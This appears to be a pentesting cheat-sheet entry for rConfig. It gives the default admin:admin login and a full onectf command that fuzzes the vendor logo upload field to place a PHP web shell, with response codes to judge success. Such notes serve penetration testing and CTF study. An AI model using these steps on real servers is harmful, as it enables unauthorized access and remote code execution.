rConfig
rConfig is a network configuration management tool. At least from the GitHub (0.5k β) repository, it doesn't seem very popular.
- Look for web interface on port 80
- Test default credentials
admin:admin
Look for well-known CVEs, the version is at the bottom of the page.
If successfully logged, you may try to upload a shell. Navigate to Devices > Vendors, click on Add Vendor and try to exploit the image field. For reference, with onectf:
$ onectf uffuf -u 'https://IP/lib/crud/vendors.crud.php' -v -k --nr -H 'Cookie: PHPSESSID=XXX' -d 'vendorName=onectf&add=add&editid=' -p vendorLogo -F webshell.php -Fn imageFUZZ -Ft image/gif -W .php
[302 or 200] means OK
[301] means KO